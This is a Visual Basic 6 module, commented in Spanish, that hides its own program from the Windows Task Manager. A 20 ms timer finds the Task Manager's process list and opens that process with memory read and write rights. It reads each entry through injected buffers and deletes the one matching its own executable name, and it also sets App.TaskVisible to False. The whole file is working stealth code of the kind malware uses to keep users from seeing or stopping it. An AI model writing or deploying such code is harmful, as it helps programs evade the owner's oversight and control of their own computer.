Attribute VB_Name = "Module1"
Option Explicit
'Declaraciones Api
'*************************************
'Retorna un handle de ventana
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal _
                                        lpClassName As String, ByVal lpWindowName _
                                        As String) As Long
'Enumera las ventanas hijas a partir de una superior
Public Declare Function EnumChildWindows Lib "user32" (ByVal hWndParent As Long, _
                                        ByVal lpEnumFunc As Long, ByVal lParam As _
                                        Long) As Long
'Devuelve el texto de una ventana a partir del handle
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal _
                                        hwnd As Long, ByVal lpString As String, ByVal _
                                        cch As Long) As Long
'REcupera el nombre de la clase de ventana a partir del handle
Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd _
                                        As Long, ByVal lpClassName As String, ByVal _
                                        nMaxCount As Long) As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As _
                                        Long, ByVal wMsg As Long, ByVal wParam As Long, _
                                        lParam As Any) As Long

'Apis para usar un temporizador
Public Declare Function SetTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long, _
                                        ByVal uElapse As Long, ByVal lpTimerFunc As _
                                        Long) As Long
Public Declare Function KillTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As _
                                        Long) As Long

Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, _
                                        lpdwProcessId As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, _
                                        lpBaseAddress As Any, lpBuffer As Any, ByVal nSize _
                                        As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, _
                                        lpBaseAddress As Any, lpBuffer As Any, ByVal _
                                        nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal _
                                        bInheritHandle As Long, ByVal dwProcessId As _
                                        Long) As Long

'Constantes
'****************************************

Const PROCESS_VM_OPERATION = &H8
Const PROCESS_VM_READ = &H10
Const PROCESS_VM_WRITE = &H20
Const PROCESS_ALL_ACCESS = 0
Private Const PAGE_READWRITE = &H4&

Const MEM_COMMIT = &H1000
Const MEM_RESERVE = &H2000
Const MEM_DECOMMIT = &H4000
Const MEM_RELEASE = &H8000
Const MEM_FREE = &H10000
Const MEM_PRIVATE = &H20000
Const MEM_MAPPED = &H40000
Const MEM_TOP_DOWN = &H100000

Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As _
                                            Long, ByVal lpAddress As Long, ByVal _
                                            dwSize As Long, ByVal flAllocationType _
                                            As Long, ByVal flProtect As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, _
                                            lpAddress As Any, ByVal dwSize As Long, _
                                            ByVal dwFreeType As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

'Constantes para el ListView de la ventana del administrador de tareas
Private Const LVM_FIRST = &H1000
Private Const LVM_GETTITEMCOUNT& = (LVM_FIRST + 4)

Private Const ILVM_GETITEMW = (LVM_FIRST + 75)
Private Const LVIF_TEXT = &H1
Private Const LVM_DELETEITEM = 4104


Public Type LV_ITEM
    mask As Long
    iItem As Long
    iSubItem As Long
    state As Long
    stateMask As Long
    lpszText As Long 'LPCSTR
    cchTextMax As Long
    iImage As Long
    lParam As Long
    iIndent As Long
End Type

Type LV_TEXT
    sItemText As String * 80
End Type


Public Function Procesos(ByVal hWnd2 As Long, lParam As String) As Boolean
  Dim Nombre As String * 255, nombreClase As String * 255
  Dim Nombre2 As String, nombreClase2 As String
  Dim X As Long, Y As Long
  X = GetWindowText(hWnd2, Nombre, 255)
  Y = GetClassName(hWnd2, nombreClase, 255)
  'Buffers
  Nombre = Left$(Nombre, X)
  nombreClase = Left$(nombreClase, Y)
  
  Nombre2 = Trim$(Nombre)
  nombreClase2 = Trim$(nombreClase)
  
  'SysListView32 es el nombre de clase del LV del Administrador de T
  If nombreClase2 = "SysListView32" And Nombre2 = "Procesos" Then
     OcultarItems (hWnd2)
     Exit Function
  End If
  
  If Nombre2 = "" And nombreClase2 = "" Then
     Procesos = False
  Else
     Procesos = True
  End If
End Function

'A esta funcin se le pasa el Handle del ListView del Administrador de tareas _
que es obtenido desde la funcin " Procesos "
Private Function OcultarItems(ByVal hListView As Long) ' As Variant
   Dim pid As Long, tid As Long
   Dim hProceso As Long, nElem As Long, lEscribiendo As Long, i As Long
   Dim DirMemComp As Long, dwTam As Long
   Dim DirMemComp2 As Long
   Dim sLVItems() As String
   Dim li As LV_ITEM
   Dim lt As LV_TEXT
   If hListView = 0 Then Exit Function
   tid = GetWindowThreadProcessId(hListView, pid)
   
   'Obtiene el nmero de items del ListView
   nElem = SendMessage(hListView, LVM_GETTITEMCOUNT, 0, 0&)
   
   If nElem = 0 Then Exit Function
   
   ReDim sLVItems(nElem - 1)
   
   li.cchTextMax = 80
   
   dwTam = Len(li)
      DirMemComp = GetMemComp(pid, dwTam, hProceso)
      DirMemComp2 = GetMemComp(pid, LenB(lt), hProceso)
      
      For i = 0 To nElem - 1
          li.lpszText = DirMemComp2
          li.cchTextMax = 80
          li.iItem = i
          li.mask = LVIF_TEXT
          WriteProcessMemory hProceso, ByVal DirMemComp, li, dwTam, lEscribiendo
          lt.sItemText = Space(80)
          WriteProcessMemory hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo
          
          'Recupera un item del LV
          Call SendMessage(hListView, ILVM_GETITEMW, 0, ByVal DirMemComp)
          Call ReadProcessMemory(hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo)
          
          'Ac verifica si lt.sItemText es el nombre del exe. Si est Lo elimina
          
          If TrimNull(StrConv(lt.sItemText, vbFromUnicode)) = App.EXEName & ".exe" Then
           Call SendMessage(hListView, LVM_DELETEITEM, i, 0)
           Exit Function
          End If
      Next i
      
      CloseMemComp hProceso, DirMemComp, dwTam
      CloseMemComp hProceso, DirMemComp2, LenB(lt)

End Function

Private Function GetMemComp(ByVal pid As Long, ByVal memTam As Long, hProceso As Long) As Long
    
    hProceso = OpenProcess(PROCESS_VM_OPERATION Or PROCESS_VM_READ _
                           Or PROCESS_VM_WRITE, False, pid)
    GetMemComp = VirtualAllocEx(ByVal hProceso, ByVal 0&, ByVal memTam, _
                           MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
End Function

Private Sub CloseMemComp(ByVal hProceso As Long, ByVal DirMem As Long, ByVal memTam As Long)
   
   Call VirtualFreeEx(hProceso, ByVal DirMem, memTam, MEM_RELEASE)
   CloseHandle hProceso

End Sub

'Elimina los nulos
Private Function TrimNull(sInput As String) As String
   Dim pos As Integer
   pos = InStr(sInput, Chr$(0))
   If pos Then
      TrimNull = Left$(sInput, pos - 1)
      Exit Function
   End If
   TrimNull = sInput
End Function

'Temporizador que cheaquea constantemente si el Administrador de tareas est ejecutandose
Public Sub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long)
Dim Handle As Long
'Se obtiene el HWND del administrador de tareas
Handle = FindWindow(vbNullString, "Administrador de tareas de Windows")

'Si el administrador est visible el handle es distinto de 0 _
y se llama a EnumChildWindows pasandole el Handle del AT y la direccin _
de la funcin Procesos. EnumChildWindows obtiene el handle del ListView
If Handle <> 0 Then
   EnumChildWindows Handle, AddressOf Procesos, 1
End If
End Sub

'Oculta y visualiza el item del proceso
Public Sub Ocultar(ByVal hwnd As Long)
    App.TaskVisible = False
    SetTimer hwnd, 0, 20, AddressOf TimerProc
End Sub

Public Sub Mostrar(ByVal hwnd As Long)
    App.TaskVisible = True
    KillTimer hwnd, 0
End Sub

